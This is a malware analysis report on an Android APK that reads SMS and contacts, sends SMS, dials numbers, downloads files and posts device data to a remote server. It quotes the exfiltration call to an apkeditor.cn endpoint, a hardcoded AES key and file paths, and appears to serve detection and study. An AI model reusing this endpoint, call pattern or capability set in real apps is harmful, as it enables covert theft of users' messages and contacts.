Basic Information:
------------------------------------------
Target OS: Android
File Type: Android archive File
Lang: Java
Size: 1.24M
MD5SUM: aec59ebd533124728bdb1637df7b5a35
Test Environment:
- Hybrid Analysis
 \
  |--> CrowdStrike Falcon
  |--> MetaDefender
  |--> VirusTotal
------------------------------------------

Permissions:
----------------------------------------------------
- android.permission.READ_SMS (RISKY)
 \
  |--> Allows an application to read SMS messages.

- android.permission.INTERNET
 \
  |--> Allows applications to open network sockets.

- android.permission.CAMERA (RISKY)
 \
  |--> Required to be able to access the camera device.

- android.permission.READ_EXTERNAL_STORAGE (RISKY)
 \
  |--> Allows an application to read from external storage.

- android.permission.WRITE_EXTERNAL_STORAGE (RISKY)
 \
  |--> Allows an application to write to external storage.

- android.permission.REQUEST_INSTALL_PACKAGES (RISKY)
 \
  |--> Allows an application to request installing packages.

- android.permission.READ_PHONE_STATE (RISKY)
 \
  |--> Allows read only access to phone state.

- android.permission.READ_CONTACTS (RISKY)
 \
  |--> Allows an application to read the user's contacts data.
----------------------------------------------------

Activities:
-------------------------------
- com.webview.WebViewActivity
-------------------------------

Providers:
-------------------------------------------
- android.support.v4.content.FileProvider
-------------------------------------------

Abilities:
--------------------------------------------------------------------
- This file is trying to access victim's SMS data and probably be able to send SMS to another devices.
 \
  |--> Function: "private static String getSMS(final Context context)"
  |--> Function: "public static void sendSms(final Context context, String s, final String s2)"

- This file is trying to access victim's contact data.
 \
  |--> Function: "private static String readContacts(final Context context)"

- This file sends informations about victim's device to remote hosts.
 \
  |--> Function: "UrlHttpUtil.post("http://www.apkeditor.cn/api/SendContactInfo.aspx", hashMap, new CallBackUtil())"

- This file is probably downloads another files to get persistence on victim's device.
 \
  |--> Function: "public static void downloadFile(final String s, final CallBackUtil.CallBackFile callBackFile)"

- This file is possibly tries to encrypt its data for remote communications.
 \
  |--> Function: "public static byte[] encryptData(final String s, final String s2, final String s3)"

- This file uses Javascript to handle web browsers
 \
  |--> Function: "public static String getAutoJs(final Activity activity, final String s)"
  |--> Class: "public class b extends WebChromeClient"

- This file is probably dials another devices.
 \
  |--> Function: "public static void callDial(final Context context, final String str)"

- This file tries to get information about victim's device's cpu
 \
  |--> Function: "public static String readCpuInfo()"
--------------------------------------------------------------------

Interesting things:
-----------------------------------------------
- This file is probably from Asia countries (China or Japan)
 \
  |--> String: "sb.append("WEiChong03_69");"
  |--> String: "hashMap.put("Phone", "badyun");"

- Found an invite code.
 \
  |--> String: "hashMap.put("InviteCode", "4FF2D8924C231112F0A04DB5EBC400DA");"

- Found a AES key.
 \
  |--> String: AES_KEY = "infoinfoinfoinfo";

- Found paths.
 \
  |--> String: FileUtils.PATH_DATA = "/sdcard/shurufadata/";
  |--> String: FileUtils.PATH_DATA_INFO = "/sdcard/shurufadata/info.txt";
  |--> String: FileUtils.PATH_DATA_WORD = "/sdcard/shurufadata/word.txt";
  |--> String: FileUtils.PATH_DATA_FLAG = "/sdcard/shurufadata/flag.log";
-----------------------------------------------

Detected by:
-----------------------------------------------
- VirusTotal
 \
  |--> 5/65

- Hybrid Analysis
 \
  |--> MetaDefender
   \-> Clean
   /
  |--> VirusTotal
   \-> %7

- Scan reports
 \
  |--> VirusTotal
   \-> https://www.virustotal.com/gui/file/21d10aa53370fa15664545b00e86f35ae5f4a2b3f42e33291dc071e8b25e6e26/detection
   /
  |--> Hybrid Analysis
   \-> https://www.hybrid-analysis.com/sample/21d10aa53370fa15664545b00e86f35ae5f4a2b3f42e33291dc071e8b25e6e26
   \-> https://www.hybrid-analysis.com/sample/21d10aa53370fa15664545b00e86f35ae5f4a2b3f42e33291dc071e8b25e6e26/5fc14757f469f710a05529f1
-----------------------------------------------

Used Tools During Tests:
-----------------------------------------------
- Qu1cksc0pe
 \
  |--> https://github.com/CYB3RMX/Qu1cksc0pe

- Sandbox Environments
 \
  |--> https://www.virustotal.com
  |--> https://www.hybrid-analysis.com

- Dex2Jar
- Java decompiler
 \
  |--> http://www.javadecompilers.com/
-----------------------------------------------